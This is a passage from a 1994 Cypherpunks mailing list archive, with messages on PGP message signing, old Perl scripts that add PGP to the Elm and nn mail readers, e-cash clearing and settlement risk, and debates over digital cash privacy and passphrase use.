something with them, just to prove their viability. They are exchangeable
1-for-1 for US$, but only in terms of services on Sameer's system. If
anyone has a t-shirt or something similar that they'd like to sell,
please let me know.

Perhaps we should make the Cypherpunks motto a bit less ambitious.
Instead of "Cypherpunks write code," how about merely "Cypherpunks use
tools."
Raph

From greg at ideath.goldenbear.com Thu Dec 1 15:48:17 1994
From: greg at ideath.goldenbear.com (Greg Broiles)
Date: Thu, 1 Dec 94 15:48:17 PST
Subject: PGP signing tools for Elm/Pine/nn
Message-ID: <199412012347.AA13396@ideath.goldenbear.com>

-----BEGIN PGP SIGNED MESSAGE-----

Recent comments re the signing controversy give me the impression that a
repeat of this information might be useful. I apologize if this seems
like a waste of bandwidth.

I can't seem to find a copy of a tool to make .shar's (or whatever one
calls them) so I've separated files with ===== markers. I have also
uploaded a gzip'ed .tar of these files, plus a gzip'ed copy of the
mkpgp.txt.uu document referenced below, to cypherpunks/incoming on
ftp.csua.berkeley.edu.

These scripts + a copy of PGP interface nicely with Pine or Elm and NN to
sign/encrypt outgoing messages, and decrypt or signature-verify incoming
mail.

The four files below came with the PGP 2.3 distribution (under
contrib/elm_nn); they were not included in the later distributions. I
don't know why. They still seem to work fine with the newer MIT-PGP
stuff.

The "mkpgp" script referenced in Michael Handler's message seems to work
fine from inside Pine; but I mostly stick with Elm and nn, so haven't
used it much.

Again, sorry to use list bandwidth for this; I thought that these were
already in the hands of most of the folks on the list but the last few
days' messages make me feel uncertain about that.

(And no, for the zillionth time, it's not great policy to use PGP on a
machine where you're not root. Use a small key marked "unsecure" and get
on with life. It won't protect you from root but it will protect you from
Detweiler and other small-time annoyances.)

===== Michael Handler's message =====

From: Michael Handler
Subject: Interfacing PGP with Pine (Script pointer)
Date: 25 Nov 1994 07:03:03 -0800
Message-ID:

For a well written script to interface PGP with Pine:

    finger slutsky at lipschitz.sfasu.edu | pgp -f > mkpgp.txt.uu

If you don't have finger access, mail me privately, and I'll send the
file to you.

Mike, who is only as elegant as his actions let him be

- --
Michael Handler                           Philadelphia, PA
Civil Liberty Through Complex Mathematics
VoicePGP Development Team
soc.support.youth.gay-lesbian-bi co-moderator

===== readme =====

To integrate PGP 2.1 with Elm and NN:

0) Make sure the path of Perl in the first line of each of the three
   files reflects the full path of this utility for your system. Also,
   make sure that the EDITOR and PAGER environment variables reflect your
   editor and pager of choice (vi and less will be used by default).

1) Put the files morepgp, mailpgp, and postpgp in one of the directories
   on your PATH.

2) Modify your ~/.elm/elmrc file to contain the following lines:

       editor = mailpgp
       pager = morepgp

3) Modify your ~/.nn/init file to contain the following lines:

       set editor postpgp

That's all folks! Now, each time you post a message or reply to a message
with nn, after you exit your editor, you will be asked whether you want
to sign your message. Each time you compose a private message with elm,
or reply to a message, and leave the editor, you'll be asked whether you
want to sign and/or encrypt the message. When you browse a message, if it
contains any PGP blocks, those will be properly interpreted. When you
reply to a message containing PGP blocks, you'll have them properly
decrypted and quoted in your editor.

BUGS

1) You cannot encrypt messages that you mail from nn. You can only sign
   them.

2) When you reply to a PGP-encrypted message, the encrypted message is
   temporarily kept on the disk, which is a security hole.

3) The temporary files are not wiped out, they are just deleted.
4) The scripts are ugly, reflecting my lack of knowledge of Perl. In
   fact, I don't know Perl at all; I hacked somebody else's scripts. If
   you know Perl better than me, please feel free to improve the scripts
   and don't forget to mail me a copy of the improved version. I can be
   contacted as Vesselin Bontchev at
   bontchev at fbihh.informatik.uni-hamburg.de

===== mailpgp =====

#!/usr/bin/perl

($visual = $ENV{'VISUAL'}) || ($visual = '/usr/ucb/vi');
$topgp = 0;
$blanks = 0;
$paragraphs = 1;
$blankcompress = 1;
$name = $ARGV[$#ARGV];
umask (077);
open (INPUT, "<$name") || die "Cannot open $name for input.\n";
open (OUTPUT, ">${name}.rply") || die "Cannot open ${name}.rply for output.\n";

# Copy the quoted message, compressing blank lines and decrypting any
# quoted PGP block it contains.
while (<INPUT>) {
  if (!$topgp && !m/^> -----BEGIN PGP .*-----/) {
    if (m/^> *$/) {
      if ($paragraphs) {
        if ($blankcompress) {
          if ($blanks == 0) {
            print OUTPUT "\n";
            $blanks = 1;
          }
        } else {
          print OUTPUT "\n";
        }
      } else {
        print OUTPUT;
      }
    } elsif (m/^ *$/) {
      if ($blankcompress) {
        if ($blanks == 0) {
          print OUTPUT "\n";
          $blanks = 1;
        }
      } else {
        print OUTPUT;
      }
    } else {
      print OUTPUT;
      if ($. == 1 && !m/^> /) {
        print OUTPUT "\n";
        $blanks = 1;
      } else {
        $blanks = 0;
      }
    }
  }
  # Start of a quoted PGP block: collect it in a temporary file.
  if (!$topgp && m/^> -----BEGIN PGP .*-----/) {
    $topgp = 1;
    $tmpfile = "${name}.pgp";
    unlink ($tmpfile);
    open (TMPFILE, ">$tmpfile") || die "Cannot open $tmpfile for output.\n";
  }
  if ($topgp) {
    $_ =~ s/^> //;
    print TMPFILE $_;
    # End of the block: run pgp on it and quote the cleartext.
    if (m/^-----END PGP .*-----/) {
      $topgp = 0;
      close TMPFILE;
      $clrfile = "${name}.clr";
      `pgp $tmpfile -o $clrfile`;
      open (CLEAR, "<$clrfile") || die "Cannot open $clrfile for input.\n";
      print OUTPUT "-----BEGIN OF PGP DECRYPTED TEXT-----\n\n";
      while (<CLEAR>) {
        if (m/^$/) {
          print OUTPUT "\n";
        } else {
          print OUTPUT "> ";
          print OUTPUT;
        }
      }
      close CLEAR;
      unlink ($clrfile);
      unlink ($tmpfile);
      print OUTPUT "\n-----END OF PGP DECRYPTED TEXT-----\n\n";
    }
  }
}
close OUTPUT;
close INPUT;
unlink ($name);
rename ("${name}.rply", "$name");

# Hand the prepared reply to the user's editor.
system ($visual, @ARGV);

while (!$q) {
  print "Sign this message? [Y]: ";
  $q = <STDIN>;
  $q =~ s/[ \t\n]//g;
  $q = substr ($q, 0, 1);
  if (($q eq 'Y') || ($q eq 'y') || ($q eq '')) {
    push(@opts,'-st','+clearsig=on');
    $q = "y";
  } elsif (($q ne 'N') && ($q ne 'n')) {
    $q = '';
  }
}
$q='';
while (!$q) {
  print "Encrypt this message? [Y]: ";
  $q = <STDIN>;
  $q =~ s/[ \t\n]//g;
  $q = substr ($q, 0, 1);
  if (($q eq 'Y') || ($q eq 'y') || ($q eq '')) {
    push(@opts,'-e');
    $q = "y";
  } elsif (($q ne 'N') && ($q ne 'n')) {
    $q = '';
  }
}
# Replace the message with pgp's ASCII-armored output if pgp succeeded.
if (@opts) {
  system ('pgp','-a',@opts,$name);
  if ($? == 0) {
    unlink ($name);
    rename ("${name}.asc", "$name");
  }
}

===== morepgp =====

#!/usr/bin/perl
# written by jason steiner, jsteiner at anwsun.phya.utoledo.edu, Jan 1993
#
# if you use or make improvements to this program i would appreciate
# copies of your modifications & your PGP public key.

$|=1;
$topgp=0;
$logname = $ENV{'LOGNAME'};
$pager='/usr/local/bin/less -i -n -s -S -c -M';
$pager = $ENV{'PAGER'} if ($ENV{'PAGER'});
umask 077;
open (PAGER, "|$pager") || die "Cannot open pipe to $pager.\n";
print PAGER "\n";
while (<>) {
  # Start of a PGP block: collect it in a temporary file.
  if (!$topgp && m/^-----BEGIN PGP .*-----/) {
    $topgp = 1;
    $tmpfile = "/tmp/.pgp.$logname.$$";
    unlink($tmpfile);
    open (TMPFILE, ">$tmpfile") || die "Cannot open $tmpfile for output.\n";
  }
  if (!$topgp) {
    print PAGER;
  } else {
    print TMPFILE $_;
    # End of the block: pipe it through pgp and page the result.
    if (m/^-----END PGP .*-----/) {
      $topgp = 0;
      close TMPFILE;
      open (CLEAR, "pgp -f < $tmpfile |") || die "Cannot open pipe to PGP.\n";
      print PAGER "-----BEGIN PGP DECRYPTED BLOCK-----\n";
      while (<CLEAR>) {
        print PAGER;
      }
      close CLEAR;
      unlink($tmpfile);
      print PAGER "-----END PGP DECRYPTED BLOCK-----\n";
    }
  }
}
close PAGER;

===== postpgp =====

#!/usr/bin/perl
# written by jason steiner, jsteiner at anwsun.phya.utoledo.edu, Jan 1993
#
# if you use or make improvements to this program i would appreciate
# copies of your modifications & your PGP public key.

($visual = $ENV{'VISUAL'}) || ($visual = '/usr/ucb/vi');
system($visual, @ARGV);
while (!$q) {
  print "Sign this message? [Y]: ";
  $q = <STDIN>;
  $q =~ s/[ \t\n]//g;
  $q = substr ($q, 0, 1);
  if (($q eq 'Y') || ($q eq 'y') || ($q eq '')) {
    push(@opts,'-st','+clearsig=on');
    $q = "y";
  } elsif (($q ne 'N') && ($q ne 'n')) {
    $q = '';
  }
}
if (@opts) {
  $name = $ARGV[$#ARGV];
  umask(077);
  open(INPUT,$name);
  open(HEAD,">${name}.head");
  open(BODY,">${name}.body");
  # Split the article: headers go to .head, the text to be signed to .body
  # (From:, To: and Date: are copied into the signed body as well).
  while (<INPUT>) {
    if (1 .. /^$/) {
      print HEAD;
      if (m/^From: / || m/^To: / || m/^Date: /) {
        print BODY;
      }
    } else {
      print BODY;
    }
  }
  close(HEAD);
  close(BODY);
  system('pgp','-a',@opts,"${name}.body");
  if ($? == 0) {
    unlink($name);
    system "cat ${name}.head ${name}.body.asc > $name";
  }
  unlink("${name}.head");
  unlink("${name}.body");
  unlink("${name}.body.asc");
}

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLt5gen3YhjZY3fMNAQF1QwP+OETB9ibDTWxLJ3BWQsgG5tAIeSHgeWs7
cOasOVidSoHJ10LPbOjwfCP9mluUTpsWNzIXC3GRSh5QO0esOPubu5CsFUaouEo8
DwvAik5kxIUcztqry8ImktFY14UmLZDjHshN+2WU7yLNG0BBM4C2mfwqkKDN9ESX
ZK2bJj2LVF0=
=2toZ
-----END PGP SIGNATURE-----

From db at Tadpole.COM Thu Dec 1 16:08:49 1994
From: db at Tadpole.COM (Doug Barnes)
Date: Thu, 1 Dec 94 16:08:49 PST
Subject: Brands excluded from digicash beta
In-Reply-To: <199412012056.AA05724@poboy.b17c.ingr.com>
Message-ID: <9412020007.AA10969@tadpole>

Paul wrote:
>
> I'm sure that the design of a robust, usable system is nontrivial, and
> I don't mean to imply that it is. I just don't believe that a tool the
> size of Fedwire and the existing bank architectures are, or will be, required.
>

My $0.02:

The size or complexity of Fedwire is not the issue (it's actually pretty
simple compared to some of the suggestions I've heard recently). Nor is
this merely a matter of designing robust computer programs (although this
is very important). What is important is the degree of trust between the
clearing parties, the legal arrangements between the clearing parties,
and the backend of the clearing mechanism, which is settlement -- how you
balance out the real money accounts.

Let's say you have two banks, X and Y.
Bank X has slightly more merchant activity than bank Y, as bank Y is more
consumer oriented. Therefore bank Y is going to receive more real dollars
from its customers, and bank X is going to pay out more real dollars to
its customers. If these two banks are part of the same clearing system,
then it is certain that the net flow of e-cash from Y to X is going to
need to be accompanied by a flow of real US$ from bank Y to bank X. This
is called settlement. In reality, these things are extremely dynamic,
changing on a minute-by-minute basis throughout a clearing system, but
let's stick with this simple example.

As Mr. Hughes pointed out recently, the question is not whether the
system works when everything goes as expected, but rather what happens
when things fail unexpectedly. For instance, if bank X has credited the
accounts of its customers (the merchants) while waiting for bank Y to
make an offsetting real cash transfer, and bank Y goes bankrupt (or is
declared insolvent or whatever), then bank X is out that money.

There are three possible solutions. One partial solution is to not treat
e-cash as cash -- the balance does not become available at bank X until a
settlement period has passed. At this point, you might as well stop
calling it e-cash, and call it an e-check. It's still a non-trivial
situation if the bank the check is written on goes belly-up, but there is
less exposure to fraud, with an offsetting nervousness on the part of the
merchant that the e-check will bounce.

The second possibility is for all the clearing house members to trust
some central entity to handle the clearing and insulate them from the
bankruptcy of the individual members. This is how Fedwire works, and it
is arguably simpler than various types of peer-to-peer clearing systems,
but requires a great deal of trust in that central entity. It also could
have more catastrophic consequences in the event of the failure of that
central entity.

The third is that X and Y belong to a clearing association. Banks might
settle deficit positions with one another (a 'net' system), and could
negotiate a certain deficit level with all others in the system. If a
deficit was exceeded during the clearing, a partial settlement would be
required from one member to another. A variant on this is the 'net-net'
system, where banks are allowed a certain deficit position with respect
to the clearing system as a whole, and losses are shared according to
some formula in the event of a bankruptcy. Settlement is done by a bank's
paying into (or receiving from) the system according to its position at
the end of the settlement period.

This doesn't sound too complex, until you start to read the relevant
parts of the Uniform Commercial Code. To paraphrase the docco for the
xterm source code, "If you think you understand this right away, you
probably don't. It is a hideous mess."

The question of what should happen to e-cash caught in the flux of the
bankruptcy of a member of an e-cash clearing association is not
immediately clear and is every bit as important a question as the
specification of the computer protocols. It involves careful
contemplation of the relevant law, carefully constructed contractual
arrangements, and robust, well-written software.

Note that it becomes almost exponentially dicier when you try to scale it
to an international level (assuming you want to try to continue to work
within the legal frameworks of the various countries, and probably even
if you don't want to.)

Now, take bankruptcy, and replace it with "systematic fraud." Suppose
that the same fine type of folks who got involved in S&Ls get into e-cash
in a big way... the mind boggles.

From shamrock at netcom.com Thu Dec 1 16:33:48 1994
From: shamrock at netcom.com (Lucky Green)
Date: Thu, 1 Dec 94 16:33:48 PST
Subject: Eric's proposal has already helped!
Message-ID: <199412020033.QAA28597@netcom18.netcom.com>

Eric's proposal to get us to use clearsigs has already done some good: It
made me use the Mac PGP 2.6 ui clearsig feature for the first time. As
many of you told me, my sigs don't check out. I didn't have that problem
with other versions of PGP. I don't know what causes the trouble (the
message that I send out is fine, the message I get back isn't), but I
know that once I'll figure it out my tools will have improved :-)

-- Lucky Green
   PGP encrypted mail preferred.

"The very atmosphere of firearms anywhere and everywhere restrains evil
interference - they deserve a place of honor with all that's good."

From tomaz at cmir.arnes.si Thu Dec 1 16:52:05 1994
From: tomaz at cmir.arnes.si (Tomaz Borstnar)
Date: Thu, 1 Dec 94 16:52:05 PST
Subject: using us crypto sw outside usa
Message-ID: <199412020051.BAA13040@cmir.arnes.si>

Hello!

I was wondering what is the legal status for using rsaref outside usa. Is
it legal or not? Also, what is the legal status of RC4 code posted to the
net?

Thanks,
Tomaz

From eric at remailer.net Thu Dec 1 16:53:25 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 1 Dec 94 16:53:25 PST
Subject: Where to get PGP for SunOS
In-Reply-To:
Message-ID: <199412020152.RAA14315@largo.remailer.net>

Did you look at ftp.csua.berkeley.edu? The cypherpunks directory has a
whole bunch of PGP versions, including the latest generic Unix one, as I
recall.

Eric

From cactus at bb.hks.net Thu Dec 1 16:53:48 1994
From: cactus at bb.hks.net (cactus at bb.hks.net)
Date: Thu, 1 Dec 94 16:53:48 PST
Subject: Cypherpunks@hks.net service
Message-ID: <199412020058.TAA05511@bb.hks.net>

[This message has been signed by an auto-signing service. A valid
signature means only that it has been received at the address belonging
to the signature and forwarded.]

-----BEGIN PGP SIGNED MESSAGE-----

The cypherpunks at hks.net service is now available. It will sign any
message sent to cypherpunks at hks.net with its (currently 384 bit) key
and forward the signed message to cypherpunks at toad.com.

The key for the server is:

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQA9Ay7eB60AAAEBgOGkDzo6mkSp3G4W3EXwMWK8SrTVSmosuN5Y7Z2FdBS5uJ3o
1O0XNAwqGc8CJ9W3bQAFEbQuQ3lwaGVycHVuayBzaWduaW5nIGFnZW50IDxjeXBo
ZXJwdW5rc0Boa3MubmV0Pg==
=ajZM
- -----END PGP PUBLIC KEY BLOCK-----

I welcome any suggestions on the format of the message and the prepended
message.

- --
Todd Masco        | "Roam home to a dome, Where Georgian and Gothic once stood
cactus at hks.net | Now chemical bonds alone guard our blond(e)s,
cactus at bb.com  | And even the plumbing looks good." - B Fuller

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBFAwUBLt5xMyoZzwIn1bdtAQEItQGAzXF0V/4buTcY9Ry0iGsiqjpq3o6jYRr7
E6QAlTsBd5Xy9k8v/ttlXcbEIHNLuhu8
=19Vo
-----END PGP SIGNATURE-----

From eric at remailer.net Thu Dec 1 16:58:36 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 1 Dec 94 16:58:36 PST
Subject: recent voice over data
In-Reply-To: <9412012302.AA02541@pig.die.com>
Message-ID: <199412020157.RAA14321@largo.remailer.net>

   From: "Dave Emery"

   I can't quite see how this would work unless the voice was run at a
   very low level relative to the data.

I believe there are also maximum rates on the data when used with voice
(4.8 kbps?) and the modulation doesn't use echo cancellation. With the
lower bit rate you can get away with a lot, particularly with modern
DSP's.

Eric

From eric at remailer.net Thu Dec 1 17:07:08 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 1 Dec 94 17:07:08 PST
Subject: Brands excluded from digicash beta
In-Reply-To:
Message-ID: <199412020205.SAA14356@largo.remailer.net>

   From: jamiel at sybase.com (Jamie Lawrence)

   And that rule of thumb completely ignores the fact that if a
   transaction is fouled up anywhere along the line, one finds extensive
   legal liability involved instead of a 'mere' corrupt table in a
   database.

When the algorithms include "Call legal dept. and sue", the ability of
most programmers to design systems goes out the window.

Jamie's estimate of the magnitude of the problem is probably overstating
the case, but not much.

Eric

From j.fletcher at stirling.ac.uk Thu Dec 1 17:15:10 1994
From: j.fletcher at stirling.ac.uk (Jonathon Fletcher)
Date: Thu, 1 Dec 94 17:15:10 PST
Subject: Eric, please can you clarify
Message-ID: <9412020112.AA23439@forth.stir.ac.uk>

Eric,

Can you clarify your intention for the list ? I'm a little puzzled by the
alternatives that are flying about. You initially stated an intention to
delay (eventually bounce) unsigned messages to cypherpunks list. A couple
of posts back you talked about "This is an unsigned message" headers in
messages. Are you intending to implement both of these, one of these, or
one now and the other later ? What type of checking are you intending on
signatures - just syntax or signature verification ?

I apologize for asking for clarification, but I've lost the signal in
amongst all this noise.

-Jon

--
Jonathon Fletcher, j.fletcher at stirling.ac.uk
(X400: "/S=jf1/O=stirling/PRMD=uk.ac/C=gb/")

From merriman at metronet.com Thu Dec 1 17:30:29 1994
From: merriman at metronet.com (David K. Merriman)
Date: Thu, 1 Dec 94 17:30:29 PST
Subject: FYI: Eudora and PGP
Message-ID: <199412020130.AA20093@metronet.com>

>
>
>    All of MacPGP 2.3v1.1, MacPGP2.6ui, and Viacrypt PGP 2.7 can
>be driven via the use of AppleEvents, by the macpgp kit. This leads
>one to believe that all three use the same suite of events. My
>scripting environment is broken, so I can't actually test to see that
>the entire suite is the same.
>
>    The macpgp kit can be found at
>duke.bwh.harvard.edu:/pub/adam/mcip

Now, if there was just something for us PC Eudora users......

Dave Merriman

- - - - - - - - - - - - - - - - - - - - - - - - - -
Finger merriman at feenix.metronet.com for PGP public key and fingerprint.
PGP encrypted Email welcome, encouraged, and preferred. "Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy From tjb at acpub.duke.edu Thu Dec 1 18:03:13 1994 From: tjb at acpub.duke.edu (Thomas J. Bryce) Date: Thu, 1 Dec 94 18:03:13 PST Subject: Update of Secure Edit a0.3.3->a0.3.4 Message-ID: <199412020203.VAA09192@carr2.acpub.duke.edu> -----BEGIN PGP SIGNED MESSAGE----- UPDATE/PATCH OF *SECURE EDIT* for Mac FROM a0.3.3 to a0.3.4 (AND MAILING LIST NOTICE) There was a bug in Secure Edit a0.3.3 that would cause it to crash when setting a default startup pass phrase on 68k macintoshes, but not power macintoshes, which is what I was testing it on. I was not planning to release any upgrades before a major update and release in which I would overhaul most of the program, including changes advised by Colin Plumb and others. However, I thought this was important enough to release a patch. I have uploaded a patch to upgrade a0.3.3 to a0.3.4, as well as a a0.3.4 package, to ripem.msu.edu in the directory /pub/crypt/mac. These correct the bug. However, please save your work regularly as well as before using this feature, just to be safe. I am overhauling much of the program completely for the next release. The method for verifying the default password has also been changed from the previous "baroque" method. Now, it takes the MD5 hash of the key, encrypts this hash on the key, and uses the first 8 bytes of the resulting ciphertext to validate the default startup key. Please report any problems/suggestions/improvements you may have regarding Secure Edit. Also, if you wish to be on a list of email addresses that will receive information about Secure Edit updates or other Miyako Software releases, please send me an email to that effect. Anonymous IDs are, of course, fine. No code will ever be sent by email. 
Actual programs and source code must be FTP'd from ripem.msu.edu

Miyako Software
tjb at acpub.duke.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLt4R708YjrUhOUC5AQE0dQP7BvOWvOe6B1edvJ07RJ60UodPXoYAOmOX
DQ6AueVoqrfcYqvstaHQrHl/9V6Ie9P9KbQLdxlHk7CbIsyKgdwOs5YOmUSYB01V
YeIpp1YYkNa/ztpdcREtIGA4ghQMU/ijU7Ni6b/kLiITTSMr4HUosvBVEpMkh9Bw
93J/BzpvpO4=
=m0R+
-----END PGP SIGNATURE-----

From eric at remailer.net Thu Dec 1 18:10:41 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 1 Dec 94 18:10:41 PST
Subject: E-money Good or Bad?
In-Reply-To:
Message-ID: <199412020309.TAA14459@largo.remailer.net>

   From: KDAGUIO at aba.com

Welcome to cypherpunks, Mr. Daguio. Steven's article was unclear (to me, at least), about just what you do for the ABA. Could you provide a more lengthy introduction?

   Whoa! Much of the content of the discussions I had with Mr. Levy concerned the importance of protecting privacy and security for everyone. None of those comments made the cut. Yes, I have concerns about fully anonymous digital cash, but while I am not a full on crypto-anarchist, neither am I a crypto-fascist.

There are two senses of the phrase "protecting privacy and security for everyone". The first, that I favor, construes the context strictly, that is, privacy and security with respect to only the transaction system in question. The second construes the context broadly, taking into account anticipations external to the system to arrive at a judgement of what constitutes protection.

It appears that you, Mr. Daguio, are much closer to the second than the first; if this is inaccurate, please correct me. I believe these two notions of protection are irreconcilable with each other.

Protection of privacy to me means that only me and my counterparty know that we have transacted and how much we have transacted. Digital cash techniques address the first of these and my own Remote Auditing protocols can be used for the second.
Note that I did not say that the bank need know, because both these techniques allow the bank to remain willfully ignorant and yet have an assurance that they, the bank, are not at risk. Protection of security means protection against fraud and assurance of continuity of service.

On the other hand, if we assume that protection of security means that the populace should be protected against narcoterrorists by denying them a conduit for funds, then the strong privacy referred to above cannot be maintained. Nor even, in fact, can the security be maintained, as a recent seizure of funds in transit inside New York indicates. (Very delicate work; the window of opportunity for the feds was on the order of an hour, as I recall, and even though they needed a court order, they hit it.)

I am partial to the first because, at a deep level, it can be stated exactly what the requirements are, and relatively concisely. The second interpretation requires any number of assertions about the outside world and its chains of causality.

Moreover, the second interpretation includes a significant amount of discretion by public officials who are not directly accountable to the public. Not one of the executive branch officials in charge of financial matters, however construed, is elected. Congress has ceded discretionary authority to regulators and has largely left the task of interpretation to them.

This discretion with respect to what constitutes security is, to me, a Very Bad Thing. At the whim of a department, it may suddenly be declared that something new is now disapproved of. The color of law is used to justify these changes, but they coincide neither in necessity nor in sufficiency with the law.

To my knowledge, there was no intensive and large scale investigation into Rostenkowski's affairs, much less the Clintons's commodities, questionable activities, if true, certainly constitute bribery.
In a parallel issue, the FBI is known to have intercepted (legally, mind you) credit card purchases for grow lights, unquestionably legal even if associated with one of the least significant forms of drug use. So not every illegal thing is followed (not even the most serious) and legal things are.

   Let me ask you a question. If people can communicate over the net anonymously, transmit unreadable messages, and transfer unlimited amounts of fully anonymous money, haven't you, in addition to protecting some of the interests of minorities, also perfected a mechanism by which people with evil intent can engage in criminal activities completely unobserved and with no fear of prosecution?

No, we have not. What we have perfected (assuming your hypothetical) is a system where anybody with whatever intent can move money around with a strong assurance of predictability. This is manifestly _not_ the same as engaging in criminal activities completely unobserved. To pick only the most obvious examples, drug organizations still need to manufacture and distribute, and these will always remain very tangible activities.

   I have always believed that people won't come outside to play with you unless they feel safe. We want electronic commerce to work everywhere in the world.

Well we want it to work everywhere in the world, too, because that increases the opportunity for regulatory arbitrage.

A parallel with eurocurrency markets is instructive. If England allows an anonymous system and the USA doesn't, then I'll open up a eurodollar account in England and transact there. If England doesn't want to allow the system to operate there, but is willing to hold dollars for another bank in, say, Hong Kong and Hong Kong allows anonymous transaction, I use a dollar account there.

In fact it's because of the ability to perform transactions of this nature at arbitrary points in the globe that anonymous systems will be very difficult to prevent in the long term.
There will be money in it, you see, and military protection and fiber optic cable is not particularly expensive for a national government which wants a new industry, like, say, India or South Africa or Vietnam. There's a distinct possibility that the first country to deploy these systems will set up a new world financial center, and that's playing for the big time.

Eric

From lmccarth at ducie.cs.umass.edu Thu Dec 1 18:14:01 1994
From: lmccarth at ducie.cs.umass.edu (lmccarth at ducie.cs.umass.edu)
Date: Thu, 1 Dec 94 18:14:01 PST
Subject: public accounts / PGP / passphrases
Message-ID: <199412020218.VAA06287@bb.hks.net>

[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.]

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Hal writes:
> Just create a special key for your netcom account. Use no pass phrase;
> using one would give a misleading sense of security IMO. Just pass your
> mail through "pgp -saft" or equivalent and you've got it. It is easy to
> do this from most editors.

Could someone please elaborate on the foolishness of using PGP with a passphrase on a public machine (as I do) ? Am I wrong in thinking that my secret key is useless to an intruder until she guesses my passphrase ? I have no net access except via an account on a public machine, so I'm not about to start storing my secret key elsewhere, but I'll change my passphrase to if it's irrelevant anyway. I just reviewed the PGP docs a bit and Phil says "Nobody can use your secret key file without this pass phrase.", which seems to contradict what many people on the list have said.

- - -L. Futplex McCarthy; PGP key by finger or server
"Don't say my head was empty, when I had things to hide...."
--Men at Work

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLt6Cq2f7YYibNzjpAQF3KwP/ZgxKliBQe+BQ+Q0FfiN9ycxTRWRHlPWY
qF4iqmxT70uWLm6hsSX6A88EKv1E+k4mfYhVAnT8XQCTp2wEYMVOHvlFJQiKHOCj
55Cot8bL7JCrJ+lUIDdCPOnNra61F2cc+S26EyB5jIKvudzkPLsWI49galG201M7
ILld5lrJhAw=
=vc9N
- -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBFAwUBLt6D+ioZzwIn1bdtAQGz5gF+Kokq6ZW/HpgRWowG2/+3QB913tJD2opJ
+gKNrxqTK40qzj/8pdNNpreKYrf4rWIi
=9YBk
-----END PGP SIGNATURE-----

From eric at remailer.net Thu Dec 1 18:21:13 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 1 Dec 94 18:21:13 PST
Subject: Eric, please can you clarify
In-Reply-To: <9412020112.AA23439@forth.stir.ac.uk>
Message-ID: <199412020320.TAA14480@largo.remailer.net>

   From: Jonathon Fletcher

   Can you clarify your intention for the list ? I'm a little puzzled by the alternatives that are flying about.

The first time this got debated was last year. There the proposal was check sigs, delay, eventually bounce. That's not what I'm proposing this time.

I mentioned this again, and the discussion started up again. Almost at once I wanted to avoid the flames from the previous time, so I restricted the proposal to be for marking and delaying only.

   Are you intending to implement both of these, one of these, or one now and the other later ?

First of all, I'm not "planning" on any right now. I am considering doing some of them and I have decided to do some related work.

The first action would be autonag; messages sent back to non-signers from the server. The second would be automark; header fields for advocacy would be added to the messages. The third would be delay for some as yet unspecified interval. The timing of these is not decided, and would certainly be iterative.

   What type of checking are you intending on signatures - just syntax or signature verification ?

At first, only syntax checking. The problems of key distribution prevent otherwise.
   I apologize for asking for clarification, but I've lost the signal in amongst all this noise.

No, actually, a summary was in order.

Eric

From lmccarth at ducie.cs.umass.edu Thu Dec 1 18:22:39 1994
From: lmccarth at ducie.cs.umass.edu (lmccarth at ducie.cs.umass.edu)
Date: Thu, 1 Dec 94 18:22:39 PST
Subject: making public keys public
Message-ID: <199412020227.VAA06380@bb.hks.net>

[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.]

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Eric writes:
> someone (Alex Strasheim ?) writes:
> Perhaps we would have
> a default web, which would have everyone's key in it.
>
> This is a really bad idea. Some "public" keys should not be made
> public, but rather revealed only to the correspondent. Forward
> secrecy is the reason. If the public key has never been in the
> possession of an opponent, and assuming the results of the public key
> operation yield little or no information about the modulus, then when
> the keys are changed and destroyed, no amount of factoring can find
> the private key because the public key isn't around to factor.

If you're not going to make the public key public, why use public key cryptography at all ? Save time and effort and use a symmetric cipher.

- - -L. Futplex McCarthy; PGP key by finger or server
"Don't say my head was empty, when I had things to hide...."
--Men at Work

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLt6Eq2f7YYibNzjpAQGIJQQAvKd0jyHXkaNfXp787EXQl/dXMYUXz8dB
dF9NF9tiYp761ZwtkeKOoASZGYWvygO+8nseE/1pFz9Gns1XkUM0uyHvg4nvgIWj
CJHtVsbV2rtRFZfIjDwD3wqsfRTRms5JvFcRpUsOSKol93hcabnIf3Vx9EAdIUSv
hEtvQUBhzKY=
=3yjE
- -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBFAwUBLt6F9SoZzwIn1bdtAQFUvwGAhbycPCwIjZGjGeNMWkgnxQUJw6v2RpU3
Z2hvAV6sSiz3+wyLlkR+Nz9nTgRHqjWT
=RaG/
-----END PGP SIGNATURE-----

From alex at omaha.com Thu Dec 1 18:32:45 1994
From: alex at omaha.com (Alex Strasheim)
Date: Thu, 1 Dec 94 18:32:45 PST
Subject: autodecrypting incoming mail
Message-ID: <199412020224.UAA01009@omaha>

-----BEGIN PGP SIGNED MESSAGE-----

I've been fooling around with scripts which automatically decrypt incoming mail, and I'm curious about how others are approaching the problem. In particular, I'm interested in how Mime gets mixed in.

A problem with using a script which acts as a PGP aware pager to display mail is that it would choke on certain types of Mime data, an attached binary, for example. The best solution to this problem would be a PGP aware Mime mailer, but that's too hard for me, so I've been playing around with scripts which will transform mail spool files with cyphertext in them into mail spool files which are all plaintext.

First of all, I'm assuming that premail was used to encrypt the mail automatically. To try to get a handle for what's going on with the headers, I've been sending mail from elm, pine, and /bin/mail and seeing how they vary as encryption is added.

